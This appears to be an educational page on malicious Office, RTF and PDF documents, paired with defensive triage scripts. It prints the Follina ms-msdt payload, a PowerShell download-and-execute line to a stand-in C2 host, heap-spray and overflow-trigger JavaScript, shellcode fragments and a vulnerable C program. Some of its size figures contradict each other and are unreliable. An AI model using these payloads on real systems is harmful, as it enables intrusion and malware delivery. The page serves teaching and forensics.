// Follina Attack Flow (CVE-2022-30190) — Full Technical Detail 1. THE DOCUMENT STRUCTURE Attacker creates a .docx file (which is a ZIP archive containing XML). Inside the ZIP, they modify: word/_rels/document.xml.rels They add an external OLE object reference: <Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/ 2006/relationships/oleObject" Target="https://attacker-server.com/payload.html" TargetMode="External" /> The .docx itself contains NO malicious code — it just has a URL. 2. WORD FETCHES THE REMOTE PAYLOAD → User opens the .docx (or just hovers over it in Explorer) → Word parses document.xml.rels, finds the external relationship → Word makes an HTTP GET request to the attacker's server → The server responds with an HTML file: 3. THE HTML PAYLOAD (served by attacker) <!DOCTYPE html> <html><body> <script> window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h]$(IEX('powershell -e JABjAGw...')) i]/../../../../../../../../../../../temp/doc.html\";"; </script> </body></html> 4. MSDT EXECUTES THE PAYLOAD → The ms-msdt: URI launches Microsoft Support Diagnostic Tool → MSDT parses the /param arguments → The IT_BrowseForFile parameter contains a PowerShell command wrapped in $() — which MSDT executes as part of path expansion → PowerShell runs with the user's full privileges → The base64-encoded command (JABjAGw...) decodes to: $c=New-Object Net.WebClient; $c.DownloadFile('http://c2.evil.com/shell.exe','C:\Temp\s.exe'); Start-Process 'C:\Temp\s.exe' 5. RESULT: FULL REMOTE CODE EXECUTION → No macro prompt — this isn't a macro attack → No "Enable Content" — there's no VBA code → Protected View was bypassed in RTF files (no sandbox at all) → Even the Explorer Preview Pane triggered the exploit → The user saw a normal document. The system was fully compromised. // Impact: Affected all Windows versions with Office installed. 
// Patched in June 2022. Exploited in the wild by APT groups // including Chinese state-sponsored actors targeting US/EU.
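Mitigation: before the June 2022 patch, Microsoft's recommended workaround was to disable the MSDT URL protocol by deleting its registry key from an elevated Command Prompt (after backing the key up with reg export):
reg delete HKCR\ms-msdt /f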
PDF files aren't just static pages — the PDF specification (ISO 32000, over 1,000 pages) supports embedded JavaScript, form actions, URI handlers, launch actions, complex stream objects, and encrypted content. Adobe Reader includes a full JavaScript engine (based on SpiderMonkey) that can execute code embedded inside PDF objects. Attackers weaponize these features to run arbitrary code the instant a PDF is opened.
A PDF file is structured as a collection of numbered objects. Each object has a type and properties defined by key-value pairs. Objects can reference other objects by number. The root of the document is the Catalog, which the trailer's /Root entry identifies (it is Object 1 in the examples here, but the number is not fixed). The Catalog points to the page tree, which points to individual pages, which point to content streams containing the actual text and graphics. Hidden among these legitimate objects, an attacker adds JavaScript Action objects and compressed payload streams that execute automatically on open.
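A quick first-pass triage for a suspect PDF is to count the name keys associated with automatic actions and scripting. The sketch below does this with a regular expression over the raw bytes of a small hand-written fragment. The keyword list and function name are assumptions for illustration, and the approach has known blind spots: names can be written with #xx hex escapes, and objects stored inside compressed object streams are not visible until decompressed.

```python
import re

# Name keys commonly associated with automatic actions and scripting.
SUSPICIOUS_KEYS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch"]


def count_keywords(pdf_bytes):
    """Count occurrences of each key, ignoring longer names that share a prefix."""
    counts = {}
    for key in SUSPICIOUS_KEYS:
        pattern = re.escape(key) + rb"(?![A-Za-z0-9])"
        counts[key.decode()] = len(re.findall(pattern, pdf_bytes))
    return counts


# Hand-written fragment resembling a Catalog with an auto-run JavaScript action.
sample = (
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >>\nendobj\n"
    b"7 0 obj\n<< /Type /Action /S /JavaScript /JS 8 0 R >>\nendobj\n"
)

report = count_keywords(sample)
for key, count in report.items():
    print(f"{key:<12} {count}")
```

A document that combines /OpenAction with /JavaScript deserves closer inspection; a plain invoice normally has neither.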
Below, we show two complete PDF files opened in a text editor — every single line of their internal structure is visible. The first is a clean, legitimate invoice. The second is the same invoice after an attacker has weaponized it by injecting three additional objects and modifying one line of the Catalog. Understanding the difference between these two files is the core of PDF forensics.
If you open a PDF file in Notepad (or a hex editor), you will see its raw internal structure. A PDF is not an opaque binary blob: its skeleton is plain text made of numbered objects, each with a type and properties, although stream contents are usually compressed and appear as binary data. Below are two complete PDFs: a legitimate invoice, and the same invoice after an attacker has weaponized it. Every single line is shown, with nothing skipped.
- The attacker adds /OpenAction 7 0 R to Object 1 (the Catalog); this is the auto-execute trigger.
- Object 7 chains to a second action through /Next (a reader performs /Next actions in sequence after the current one).
Different document formats are exploited in fundamentally different ways. Each technique is covered in turn below:
The PDF specification (ISO 32000) officially supports JavaScript. Adobe Reader includes a full SpiderMonkey JS engine (the same engine Firefox uses). This means a PDF file can contain complete JavaScript programs that execute automatically. Attackers abuse this to:
- Execute automatically when the file opens (/OpenAction), with no user interaction required
- Trigger on other events: page open (/AA /O), form-field keystrokes (/AA /K), print events (/AA /WP), or even document close
- Call Reader-specific APIs such as Collab.collectEmailInfo(), util.printf(), and spell.customDictionaryOpen(), many of which have had buffer overflow vulnerabilities
- Fingerprint the reader with app.viewerVersion and serve version-specific exploits
Here's what the decoded JavaScript inside a malicious PDF actually looks like. It is extracted from the compressed stream object (Object 9 in the annotated file) after running it through a FlateDecode decompressor (tools like pdf-parser.py -o 9 -f do this automatically):
// DECODED from the FlateDecode stream — this is what runs // when the PDF opens in a vulnerable Adobe Reader var shellcode = unescape( "%u4141%u4141%u4242%u4242" + // NOP sled (encoded as Unicode) "%ue8fc%u0082%u0000%u8960" + // Shellcode start "%ue531%u64f0%u508b%u8b30" + // PEB walk to find kernel32 "%u0c52%u528b%u8b14%u2872" + // Locate LoadLibraryA "%u18b1%u50ff%u3368%u6832" + // Resolve API addresses // ... hundreds more bytes ... ); // HEAP SPRAY — fill memory with shellcode copies var spray = new Array(); var chunk = ""; // Build a 1MB block: NOP sled + shellcode var nopsled = unescape("%u0c0c%u0c0c"); while (nopsled.length < 0x100000) { nopsled += nopsled; } chunk = nopsled.substring(0, 0x100000 - shellcode.length); // Spray 200 copies across the heap (~200 MB) for (var i = 0; i < 200; i++) { spray[i] = chunk + shellcode; } // TRIGGER — exploit vulnerability in Collab.collectEmailInfo() // Buffer overflow overwrites saved EIP → lands in NOP sled Collab.collectEmailInfo({subj: "A".repeat(0x4141)});
Heap spraying is a memory manipulation technique that makes exploit reliability dramatically higher. The core problem for an attacker is: after the buffer overflow hijacks EIP, the CPU needs to jump somewhere — but the attacker doesn't know the exact address where their shellcode landed in memory. ASLR (Address Space Layout Randomization) makes heap addresses unpredictable.
The solution: Instead of needing to guess one exact address, the attacker fills hundreds of megabytes of heap memory with copies of the shellcode, each preceded by a huge NOP sled. Now any jump into that region (a ~200MB window) will land on either a NOP sled (which slides to the shellcode) or the shellcode itself. This turns a needle-in-a-haystack problem into a barn-door problem. The spray creates ~200 identical 1MB blocks, each containing ~1,048,232 bytes of NOP sled followed by ~344 bytes of shellcode.
Exploits of this kind commonly aim for 0x0c0c0c0c because: (1) it's a predictable address in the heap region after spraying ~200MB, (2) 0x0C is the opcode for a benign instruction (OR AL, imm8) on x86, so a run of 0C bytes decodes as repeated OR AL, 0x0C and execution that lands in the middle of the sled slides harmlessly to the shellcode.
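The address arithmetic is easy to check by hand. The sketch below is illustrative only and not part of the original page: it converts the target address to decimal and MiB, and sums the raw size of 200 blocks of 0x100000 units (the count and size used in the snippet above). Treating each unit as one byte is an assumption; JavaScript string lengths count 16-bit characters, and allocator overhead is ignored.

```python
# Sanity-check the numbers behind the 0x0c0c0c0c target (arithmetic only).
MIB = 1024 * 1024

target = 0x0C0C0C0C
target_mib = target / MIB

block_count = 200        # iterations of the spray loop in the snippet above
block_units = 0x100000   # block length; assumed here to be one byte per unit
sprayed_mib = block_count * block_units / MIB

print(f"target address: {target} decimal, {target_mib:.2f} MiB into the address space")
print(f"raw spray size: {sprayed_mib:.0f} MiB")
```

The target sits just under 193 MiB, which is why a spray of roughly 200 MiB is enough to cover it only if the allocations start low in the address space and stay contiguous.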
[Hex dump: a single spray block in memory, with the repeating sled pattern followed by the shellcode]
RTF files are text-based documents parsed by Microsoft Word. Unlike .docx (which is a ZIP of XML files), RTF uses control words (like {\rtf1\ansi}) that Word's parser interprets directly. RTF supports embedded OLE objects via the {\object\objemb} control — which means an attacker can embed a binary exploit payload inside what looks like a plain text document.
Why attackers love RTF: (1) RTF files are parsed by Word's preview pane — the exploit can trigger just by selecting the file in Windows Explorer. (2) The binary payload is hex-encoded in the \objdata field, making it easy to generate with Python. (3) RTF doesn't trigger the Mark-of-the-Web check in some Office configurations. (4) Many email gateways don't inspect RTF as aggressively as .docx or .xlsx.
The example below shows an abbreviated malicious RTF: it displays a normal invoice while hiding an Equation Editor exploit (CVE-2017-11882) in the embedded OLE object. The hex digits in the \objdata field encode the binary content of the embedded object, shown here only in part:
{\rtf1\ansi\deff0 {\fonttbl{\f0 Calibri;}} \pard Invoice #2024-0342 — Acme Corp\par \pard Total Due: $4,250.00\par {\* This part looks normal to the reader} {\object\objemb\objw1\objh1 ◄ EMBEDDED OLE OBJECT {\*\objclass Equation.3} ◄ Targets Equation Editor {\*\objdata 01050000 ◄ OLE header 02000000 ◄ Format ID 0B0000004571756174696F6E ◄ "Equation" in hex 2E33000000000000000000 0000000000 1C00000002000000E9FF ◄ Overflow starts here BF0000000000 ◄ Overwrites return addr 41414141 ◄ 0x41414141 = "AAAA" FC E8 82 00 00 00 60 89 ◄ Shellcode begins E5 31 C0 64 8B 50 30 8B ◄ PEB walk... ... more shellcode bytes ... }} }
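For triage, the control words called out in the listing above can be searched for directly. The following is a minimal sketch, assuming the file has already been read as bytes; the function name `rtf_ole_indicators` and the indicator list are illustrative choices, not an established tool. Real samples often obfuscate control words, so an empty result proves nothing.

```python
import re

# Control words from the listing above that point to an embedded OLE object.
INDICATORS = {
    "embedded_object": rb"\\objemb",
    "object_data": rb"\\objdata",
    "equation_editor_class": rb"\\objclass\s+Equation\.3",
}

def rtf_ole_indicators(data: bytes) -> list[str]:
    """Return the names of the indicators found in raw RTF bytes."""
    if not data.lstrip().startswith(b"{\\rtf"):
        return []  # not an RTF document
    return [name for name, pattern in INDICATORS.items()
            if re.search(pattern, data, re.IGNORECASE)]

sample = rb"{\rtf1\ansi{\object\objemb{\*\objclass Equation.3}{\*\objdata 0105}}}"
print(rtf_ole_indicators(sample))
```

A hit on `equation_editor_class` in an inbound attachment is worth escalating, since few legitimate documents still embed Equation Editor 3.0 objects.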
OLE (Object Linking and Embedding) is a Microsoft technology that lets documents contain other documents or executable content. A Word document can embed an Excel spreadsheet, a Visio diagram, a PDF, an Equation Editor object, or even a packaged executable disguised with a custom icon. When the user double-clicks the embedded object, the associated handler application launches and processes it — and that processing is where vulnerabilities live.
How it works internally: A .docx file is actually a ZIP archive. Inside it, the word/document.xml file references embedded objects by relationship ID (e.g., r:id="rId8"). The relationship file (word/_rels/document.xml.rels) maps that ID to an embedded file (e.g., word/embeddings/oleObject1.bin). That .bin file contains the OLE structured storage with the actual exploit payload — it could be an Equation Editor exploit, a Flash SWF, an ActiveX control, or a packaged .exe with a fake PDF icon. When Word processes this document, it reads the ProgID attribute to determine which COM server to launch for the object — and that server is the vulnerable target.
<!-- .docx files are ZIP archives containing XML --> <!-- This is from word/document.xml --> <w:body> <w:p><w:r><w:t>Please review the attached report.</w:t></w:r></w:p> <!-- Normal paragraph above, but then... --> <w:p> <w:r> <w:object> <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1234567890" r:id="rId8" /> ◄ Embedded object </w:object> </w:r> </w:p> </w:body> <!-- The relationship file (word/_rels/document.xml.rels) maps rId8 --> <!-- to an embedded object in word/embeddings/oleObject1.bin --> <!-- That .bin can contain: --> <!-- • An Equation Editor exploit (CVE-2017-11882) --> <!-- • A Flash SWF exploit --> <!-- • An ActiveX control that downloads malware --> <!-- • A packaged .exe disguised as a PDF icon -->
For remote template injection, instead of embedding the payload directly, the attacker uses an external relationship:
<Relationships> <Relationship Id="rId1" Type="...normal-template..." Target="file:///Normal.dotm" /> <Relationship Id="rId8" Type="...attachedTemplate..." Target="https://evil.example/template.dotm" TargetMode="External" /> ◄ Fetches from attacker server! </Relationships> <!-- When Word opens this document, it automatically --> <!-- fetches template.dotm from the attacker's server. --> <!-- The template contains the actual macro/exploit. --> <!-- The original .docx file is CLEAN — no detections! -->
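Because the external reference lives in a plain XML part inside the ZIP, it can be listed without opening the document in Word. This is a minimal sketch using only the standard library; the function name `external_relationships` is hypothetical. Ordinary hyperlinks are also stored with TargetMode="External", so the relationship type decides whether a hit is suspicious (attachedTemplate and oleObject deserve a closer look).

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by OPC relationship parts (.rels files).
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def external_relationships(docx_bytes: bytes) -> list[tuple[str, str, str]]:
    """Return (part name, relationship type, target) for each external relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(f"{REL_NS}Relationship"):
                if rel.get("TargetMode") == "External":
                    findings.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return findings
```

Calling `external_relationships(open(path, "rb").read())` on a file from quarantine returns an empty list for a document with no external targets.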
When a victim opens a weaponized PDF, the following chain of events fires automatically. Each phase takes milliseconds. The entire sequence — from file open to full code execution — completes in under 2 seconds. The user sees a normal invoice on screen the entire time.
1. Reader parses the file and finds /OpenAction 7 0 R in the Catalog. This tells Reader: "before displaying anything, execute the action in Object 7." Object 7 is a JavaScript action that references a compressed payload stream. No click required: the PDF specification explicitly allows this for "convenience features" like auto-print.
2. Reader decompresses the stream (/FlateDecode) and executes the JavaScript inside. The script decodes shellcode from hex/unicode encoding, then allocates 200 JavaScript string objects, each ~1MB, filling ~200MB of heap memory with sled + shellcode copies. The heap is now a minefield: almost any address the CPU jumps to will land on attacker-controlled data.
3. The script calls Collab.collectEmailInfo({subj: "A".repeat(0x4141)}). This Reader API has a stack buffer overflow: the oversized subject string (16,705 characters) overwrites past the 256-byte buffer boundary, corrupting the saved frame pointer (EBP) and the saved return address on the stack.
4. The saved return address now holds 0x0C0C0C0C, an address inside the sprayed heap region. When the vulnerable function executes ret, the CPU jumps to 0x0C0C0C0C. Because the heap is filled with sled + shellcode, the CPU lands on a sled byte (0x0C, which decodes as a harmless OR AL instruction rather than the classic NOP, 0x90), slides forward through the sled, and hits the shellcode. The attacker now controls execution.
Below is the complete source of a weaponized PDF file with every object annotated. The 8 numbered comments show where the attacker planted each trap. A legitimate PDF only needs Objects 1-6. Objects 7, 8, and 9 are what the attacker added.
%PDF-1.4 /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ① THE TRAP DOOR (/OpenAction) This is Object 1 — the Catalog — the root of the entire PDF. It looks normal except for ONE added line: /OpenAction 7 0 R This tells the reader: "When you open this file, IMMEDIATELY execute whatever Object 7 says to do." The user never sees this happen. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 1 0 obj << /Type /Catalog /Pages 2 0 R ← normal: points to the page tree /OpenAction 7 0 R ← ★ THE TRAP: auto-execute Object 7 on file open >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ② THE VISIBLE PAGES (Objects 2-6) These are 100% legitimate. They define the invoice the user sees on screen — fonts, layout, text content. Nothing suspicious. They exist solely to make the file look real. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] ← US Letter size (612×792 points) /Contents 4 0 R /Resources << /Font << /F1 5 0 R >> >> >> endobj 4 0 obj ← page content stream (the visible invoice text) << /Length 342 >> stream BT /F1 16 Tf 50 750 Td (INVOICE #2024-0342) Tj /F1 10 Tf 50 720 Td (Acme Corp) Tj 50 700 Td (Total Due: $4,250.00) Tj ET endstream endobj 5 0 obj ← font definition << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj 6 0 obj ← font descriptor (optional) << /Type /FontDescriptor /FontName /Helvetica >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ③ THE WEAPON (Object 7 — JavaScript Action) This is what /OpenAction points to. It tells the reader: "Run this JavaScript." The /JS key contains the actual code, and /Next chains to Object 8 for reliability (if Object 7 fails, try Object 8 instead). 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 7 0 obj << /Type /Action /S /JavaScript ← action type: execute JavaScript /JS 9 0 R ← the JavaScript code is in Object 9 (compressed) /Next 8 0 R ← backup: if this fails, try Object 8 next >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ④ THE EMBEDDED URL (Object 8 — Backup Action) A fallback action that launches a URI if the JavaScript route fails. Some PDF readers block JS but still allow URI actions. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 8 0 obj << /Type /Action /S /URI /URI (https://evil.example/stage2.exe) ← direct download fallback >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ⑤ THE SHELLCODE + ⑥ NOP SLED + ⑦ HEAP SPRAY Object 9 is the compressed JavaScript stream. When decompressed (FlateDecode), it reveals the full exploit payload: shellcode definition, NOP sled generation, heap spray execution, and the vulnerability trigger function call. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 9 0 obj << /Length 4821 /Filter /FlateDecode ← compressed! Use pdf-parser to decompress >> stream [...4,821 bytes of zlib-compressed JavaScript... When decompressed, this becomes the heap spray + trigger code shown in the "JS Heap Spray" section below ] endstream endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ⑧ THE TRIGGER (xref + trailer) The cross-reference table tells the reader where each object starts (byte offsets). 
The trailer points to the Catalog (Object 1) which starts the entire chain: Trailer → Catalog → /OpenAction → Object 7 → JavaScript → Object 9 → Heap Spray → Trigger Overflow → EIP Hijack → Shellcode ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ xref 0 10 0000000000 65535 f ← Object 0 (free — always present) 0000000009 00000 n ← Object 1 at byte 9 (Catalog + trap) 0000000115 00000 n ← Object 2 at byte 115 (Pages) 0000000169 00000 n ← Object 3 at byte 169 (Page) 0000000330 00000 n ← Object 4 at byte 330 (visible content) 0000000721 00000 n ← Object 5 at byte 721 (font) 0000000805 00000 n ← Object 6 at byte 805 (font descriptor) 0000000889 00000 n ← Object 7 at byte 889 (★ JS Action) 0000001052 00000 n ← Object 8 at byte 1052 (★ URI fallback) 0000001188 00000 n ← Object 9 at byte 1188 (★ compressed payload) trailer << /Size 10 /Root 1 0 R ← Start here → Catalog → /OpenAction → BOOM >> startxref 6009 ← byte offset of the xref table itself %%EOF
Legitimate: Objects 1-6 (Catalog, Pages, Page, Content, Font, FontDescriptor) — these render the invoice
Malicious: Object 7 (JS Action), Object 8 (URI Fallback), Object 9 (Compressed Payload) — these run the exploit
The Connection: One line in Object 1 (/OpenAction 7 0 R) bridges the gap between "document" and "weapon"
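The same comparison can be made mechanically by counting the name keys that separate the two files. The sketch below is a rough triage aid under stated assumptions: the key list and the function name `count_risky_names` are illustrative, and it only sees names written literally in the file. Hex-escaped names (for example /J#53) and objects packed inside compressed object streams will be missed.

```python
import re

# Name keys that trigger or carry active content.
RISKY_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/URI"]

def count_risky_names(pdf_bytes: bytes) -> dict[str, int]:
    """Count literal occurrences of each risky name key in raw PDF bytes."""
    counts = {}
    for name in RISKY_NAMES:
        # A PDF name ends at whitespace or a delimiter, so /JS must not match /JSFoo.
        pattern = re.escape(name) + rb"(?=[\s/<>\[\]()]|$)"
        counts[name.decode()] = len(re.findall(pattern, pdf_bytes))
    return counts

weaponized = (b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >> endobj "
              b"7 0 obj << /Type /Action /S /JavaScript /JS 9 0 R >> endobj")
print(count_risky_names(weaponized))
```

A clean invoice like the one in this section scores zero on every key, so any non-zero count in a file that is supposed to be a static document is a reason to look closer.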
This is what's hiding inside Object 9 after decompression. Each of the 8 steps is annotated to show exactly what the JavaScript does, why it does it, and the math behind each operation.
// ═══════════════════════════════════════════════════ // STEP ① — THE SHELLCODE (the actual weapon) // This is raw machine code encoded as a JavaScript // string using %u (unicode escape) format. // When decoded: FC E8 82 00 00 00 60 89 E5 31 C0... // This code downloads & executes a remote payload. // ═══════════════════════════════════════════════════ var shellcode = unescape( "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30" + "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac" + "%u7c61%u2c02%ucf20%u0dc1%uc701%uf2e2%u5752%u528b" + "%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059" /* ... ~340 bytes total when decoded ... */ ); // MATH: Each %uXXYY = 2 bytes. The string has ~170 // %u sequences → 170 × 2 = 340 bytes of machine code. // In memory: FC E8 82 00 00 00 60 89 E5 31 C0 64... // ═══════════════════════════════════════════════════ // STEP ② — THE NOP SLED (the landing zone) // 0x0C = the NOP-equivalent byte. As a %u escape, // two 0x0C bytes = %u0c0c. This creates a tiny seed // string of NOP bytes that we'll exponentially grow. // ═══════════════════════════════════════════════════ var junk_code = unescape("%u0c0c%u0c0c"); // Result: 4 bytes → 0C 0C 0C 0C // This is the "seed" — we double it until it's huge. // ═══════════════════════════════════════════════════ // STEP ③ — NOP SLED EXPANSION (exponential doubling) // We double the NOP string in a loop until it reaches // 0x40000 (262,144) bytes. This takes only ~16 loops // because 4 × 2^16 = 262,144. Exponential growth! // ═══════════════════════════════════════════════════ while (junk_code.length < 0x40000) { junk_code += junk_code; // double the string each iteration } // Loop trace: // Start: 4 bytes // Loop 1: 8 bytes (4+4) // Loop 2: 16 bytes (8+8) // Loop 3: 32 bytes (16+16) // ... (doubles each iteration) // Loop 16: 262,144 bytes (0x40000) → STOP // Total: 262,144 bytes = 256 KB of 0C 0C 0C 0C... 
// ═══════════════════════════════════════════════════ // STEP ④ — ASSEMBLING THE SPRAY BLOCK // Each block = NOP sled (from step 3) + shellcode. // We trim the NOP sled so the total = exactly 1MB. // Block structure: [0C0C0C...×1MB-340B] [shellcode] // ═══════════════════════════════════════════════════ var spray_block = junk_code.substring(0, 0x40000 - shellcode.length); // MATH: 0x40000 = 262,144 bytes // 262,144 - 340 (shellcode) = 261,804 bytes of NOP sled // NOP % = 261,804 / 262,144 = 99.87% landing zone! spray_block += shellcode; // append the weapon at the end // Result: [0C 0C 0C 0C ... × 261,804 bytes ...] [FC E8 82 00 ...] // ← NOP sled (safe landing zone) → ← shellcode → // ═══════════════════════════════════════════════════ // STEP ⑤ — SPRAYING THE HEAP (filling memory) // We create 200 copies of the spray block in a JS // array. Each copy gets its own heap allocation. // 200 × 262,144 = 52,428,800 bytes ≈ 50MB minimum // (JS string overhead pushes actual usage to ~200MB) // ═══════════════════════════════════════════════════ var spray_array = new Array(); for (var i = 0; i < 200; i++) { spray_array[i] = spray_block.substring(0, spray_block.length); } // Each spray_array[i] holds a unique copy of the spray block. // .substring(0, length) forces a NEW string allocation each time // (prevents JS engine from just sharing a reference). // // After this loop, the process heap looks like: // [block 0][block 1][block 2]...[block 199] // Each block = 256KB of NOP+shellcode // Total sprayed = 200 × 256KB = ~50MB of raw data // With JS overhead: ~200MB of heap consumed // ═══════════════════════════════════════════════════ // STEP ⑥ — THE TARGET ADDRESS CHECK // Address 0x0C0C0C0C = 201,326,592 decimal // = ~192MB into the virtual address space. // Our spray covers addresses from ~50MB to ~250MB. // 192MB falls right in the middle → guaranteed hit! 
// ═══════════════════════════════════════════════════ // ═══════════════════════════════════════════════════ // STEP ⑦ — TRIGGER THE VULNERABILITY // Now we call a VULNERABLE Adobe Reader API with // a string that's way too long. This overflows an // internal buffer and overwrites EIP with 0x0C0C0C0C // (which is inside our sprayed heap region). // ═══════════════════════════════════════════════════ var evil_string = ""; for (var j = 0; j < 16705; j++) { evil_string += unescape("%u0c0c%u0c0c"); // fill with target address } // evil_string = 16,705 × 4 = 66,820 bytes of "0C 0C 0C 0C" // This is WAY more than the internal buffer can hold. // The overflow writes 0x0C0C0C0C over saved EIP on the stack. Collab.collectEmailInfo({subj: evil_string}); // ═══════════════════════════════════════════════════ // STEP ⑧ — WHAT HAPPENS NEXT (automatic) // 1. collectEmailInfo's internal buffer overflows // 2. Saved EIP on stack → overwritten with 0x0C0C0C0C // 3. Function returns → CPU jumps to 0x0C0C0C0C // 4. Address 0x0C0C0C0C is inside our sprayed heap! // 5. CPU executes NOP sled (0C 0C 0C 0C...) // 6. NOP sled slides to shellcode // 7. Shellcode: downloads and runs attacker's payload // 8. Game over — attacker has code execution // ═══════════════════════════════════════════════════
The PDF file (annotated above) contains Object 9 with 4,821 bytes of compressed data. When Adobe Reader decompresses it, the JavaScript code above is what executes. Steps ①-⑤ prepare the heap, Step ⑦ triggers the overflow, and Step ⑧ happens automatically. The entire process takes under 2 seconds. The user sees nothing but an invoice.
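An analyst can recover the script without ever opening the file in a PDF reader, because FlateDecode is ordinary zlib. The following is a minimal sketch, not a full parser: the function name `inflate_streams` is hypothetical, it locates streams with a regular expression instead of honouring /Length, and it silently skips anything zlib cannot inflate (other filters, filter chains, encrypted streams).

```python
import re
import zlib

# Stream data sits between the "stream" and "endstream" keywords.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

def inflate_streams(pdf_bytes: bytes) -> list[bytes]:
    """Return the decompressed contents of every stream that zlib can inflate."""
    results = []
    for match in STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        try:
            # decompressobj tolerates trailing bytes after the zlib data.
            results.append(zlib.decompressobj().decompress(raw))
        except zlib.error:
            continue  # not Flate data; skip it
    return results
```

The output is plain JavaScript text that can be read or passed to other static checks; nothing in this sketch executes it.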
Four labs follow. Each one shows how a component of the exploit is built, with the safe/normal case first and the exploited case second. Everything is static text. Nothing executes.
#include <stdio.h> #include <string.h> // THE GOAL: Attacker wants to force // the CPU to run this function. // In reality = shellcode download. void download_malware() { printf("COMPROMISED!\n"); } // THE VULNERABLE FUNCTION void parse_document(char *data) { char title_buffer[64]; // ⚠ THE VULNERABILITY: // No length check before copy! strcpy(title_buffer, data); // strcpy copies until \0 — if data // is longer than 64, it overflows // into the stack frame above. printf("Title: %s\n", title_buffer); } int main(int argc, char *argv[]) { // App receives "document" data parse_document(argv[1]); return 0; } // Normal input: "Quarterly Report" // → fits in 64 bytes, no overflow // // Attacker input: 64 bytes of junk // + 4 bytes (saved EBP) // + 4 bytes (return address → shellcode) // + NOP sled + shellcode // // When parse_document returns, EIP is // hijacked → CPU runs shellcode.
[Figure: stack layout BEFORE (normal input "Quarterly Report") and AFTER (attacker's crafted input)]
The 4 bytes that follow the saved EBP in the attacker's input (0x0c0c0c0c) overwrite the return address: when parse_document() executes ret, the CPU jumps to 0x0c0c0c0c instead of returning to main(). That address points to the NOP sled in the heap-sprayed memory, which slides into the shellcode. Game over.
%PDF-1.4 %% Object 1: Catalog (root of document) 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj %% Object 2: Page Tree 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj %% Object 3: Page definition 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 5 0 R /Resources << /Font << /F1 4 0 R >> >> >> endobj %% Object 4: Font 4 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj %% Object 5: Page content stream 5 0 obj << /Length 194 >> stream BT /F1 24 Tf 100 700 Td (INVOICE #2024-0582) Tj /F1 11 Tf 0 -30 Td (Acme Corp) Tj 0 -20 Td (Date: March 15, 2024) Tj 0 -40 Td (Security Audit ... $4,500) Tj 0 -18 Td (Pen Test .......... $3,200) Tj 0 -18 Td (Report ............ $1,800) Tj 0 -25 Td /F1 13 Tf (TOTAL: $9,500) Tj ET endstream endobj %% Object 6: Document Info 6 0 obj << /Title (Invoice) /Author (Acme Corp) >> endobj %% Cross-Reference Table xref 0 7 0000000000 65535 f 0000000009 00000 n ← Obj 1 at byte 9 0000000058 00000 n ← Obj 2 at byte 58 0000000115 00000 n ← Obj 3 at byte 115 0000000266 00000 n ← Obj 4 at byte 266 0000000333 00000 n ← Obj 5 at byte 333 0000000580 00000 n ← Obj 6 at byte 580 trailer << /Size 7 /Root 1 0 R /Info 6 0 R >> startxref 663 %%EOF
When the CPU jumps to 0x0c0c0c0c, it lands somewhere in the sprayed heap. The NOP sled "catches" the jump: no matter where in the block it lands, the CPU slides forward through the sled until it hits the shellcode.
Shellcode of this kind typically finishes by calling WinExec or URLDownloadToFile. The representation here is educational: the hex bytes map to real x86 instructions, annotated so you can see what each byte does. This is display-only.
When the demo payload runs, calc.exe launches. In a real exploit, this would be cmd.exe /c powershell -ep bypass -c "IEX(...)" downloading a RAT. In our demo, it just opens Calculator. The entire chain: Buffer Overflow → Heap Spray → Shellcode → Payload.
Acme Corp — Consulting Services
Date: March 15, 2024
| Service | Amount |
|---|---|
| Security Audit | $4,500 |
| Pen Test | $3,200 |
| Report | $1,800 |
| TOTAL | $9,500 |
✓ 6 obj · 0 JS · 0 actions · 663 bytes · SAFE
